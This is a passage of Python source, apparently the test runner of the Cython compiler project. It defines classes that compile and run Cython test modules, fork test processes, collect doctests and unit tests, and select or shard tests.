self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s) %s" % (self.language, "/pythran" if self.pythran_dir is not None else "", self.name)
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in ('warning_errors', 'clear_to_none', 'error_on_unknown_names', 'error_on_uninitialized')
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
if not cleanup_c_files:
if (rmfile[-2:] in (".c", ".h") or
rmfile[-4:] == ".cpp" or
rmfile.endswith(".html") and rmfile.startswith(self.module)):
continue
is_shared_obj = rmfile.endswith(".so") or rmfile.endswith(".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter()
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter()
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Main import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Main import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def shortDescription(self):
if self.cython_only:
return CythonCompileTestCase.shortDescription(self)
else:
return "compiling (%s%s) and running %s" % (self.language, "/pythran" if self.pythran_dir is not None else "", self.name)
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
# Py2.6 lacks "_TextTestResult.skipped"
failures, errors, skipped = len(result.failures), len(result.errors), len(getattr(result, 'skipped', []))
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
output = None
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
output = open(result_file, 'wb')
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
try:
if output is not None:
output.close()
except:
pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception("Tests in module '%s' were unexpectedly killed by signal %d"%
(module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
input = open(result_file, 'rb')
try:
PartialTestResult.join_results(result, pickle.load(input))
finally:
input.close()
if result_code:
raise Exception("Tests in module '%s' exited with status %d" %
(module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
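# Illustration of the os.waitpid() status decoding used in run_forked_test() above
# (not part of the original runner): a child that calls os._exit(1) without being
# signalled is reported with status 0x0100, so `status & 255 == 0` (no signal) and
# `status >> 8 == 1` (exit code 1).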
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run((
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
))
if mypy_result[2]:
self.fail(mypy_result[0])
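# Note on the mypy call above: mypy.api.run() returns a (stdout_report, stderr_report,
# exit_status) tuple, so mypy_result[2] is the exit status and mypy_result[0] is the
# human-readable report used in the failure message.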
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
try:
self.skipped
except AttributeError:
self.skipped = [] # Py2.6
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
try:
result.skipped.extend(skipped)
except AttributeError:
pass # Py2.6
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.name)
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "tox.ini")
paths = glob.glob(os.path.join(self.cython_dir, "**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
blacklist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in blacklist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
commands = (self.commands
.replace("CYTHON", "PYTHON %s" % os.path.join(self.cython_root, 'cython.py'))
.replace("PYTHON", sys.executable))
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
env['PYTHONPATH'] = self.cython_syspath + os.pathsep + (old_path or '')
cmd = []
out = []
err = []
for command_no, command in enumerate(filter(None, commands.splitlines()), 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if ' setup.py ' in command else 'etoe-run'):
p = subprocess.Popen(command,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
shell=True,
env=env)
_out, _err = p.communicate()
cmd.append(command)
out.append(_out)
err.append(_err)
res = p.returncode
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = 'cython.py'
if sys.version_info[0] >=3 and CY3_DIR:
cython = os.path.join(CY3_DIR, cython)
cython = os.path.abspath(os.path.join('..', '..', cython))
self.assertEqual(0, os.system(
"make PYTHON='%s' CYTHON='%s' LIBDIR1='%s' test > make.output" % (sys.executable, cython, libdir)))
try:
os.remove('make.output')
except OSError:
pass
class MissingDependencyExcluder(object):
def __init__(self, deps):
        # deps: { selector pattern string : module name }
self.exclude_matchers = []
for matcher, mod in deps.items():
try:
__import__(mod)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
        # deps: { version : (compare func, matcher func) }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = (testname in self.excludes
or testname.split('.')[-1] in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
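# Hypothetical excerpt of an exclude list understood by FileListExcluder: one test
# name per line, anything after the first whitespace is ignored, '#' starts a comment:
#
#     # known failures on this platform
#     run.some_broken_test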
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
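# Small illustrative sketch (not part of the original runner) of how string_selector()
# dispatches between tag-based and regex-based selectors; the test name and tags
# below are hypothetical.
def _selector_demo():
    by_tag = string_selector('ticket:1234')    # -> TagsSelector('ticket', '1234')
    by_name = string_selector('numpy_')        # -> RegExSelector('numpy_')
    matches_tag = by_tag('bugs.t1234', {'ticket': ['1234']})   # True
    matches_name = bool(by_name('numpy_parallel'))             # True
    return matches_tag, matches_name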
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
# It may not provide uniform distribution (in time or count), but is a
    # deterministic partition of the tests, which is important.
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=sys.version_info[0] < 3):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(testname) & 0x7fffffff if _is_py2 else _hash(testname.encode())
return hashval % self.shard_count != self.shard_num
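# Small illustrative sketch (not part of the original runner): with a shard count of 4,
# every test name is excluded by exactly three of the four ShardExcludeSelector
# instances, i.e. each test runs in exactly one shard. The test name is hypothetical.
def _shard_demo():
    shards = [ShardExcludeSelector(n, 4) for n in range(4)]
    return [n for n, selector in enumerate(shards) if not selector('run.test_example')]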
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.currentThread()
blocking_threads = []
for t in threading.enumerate():
if not t.isAlive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.isAlive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
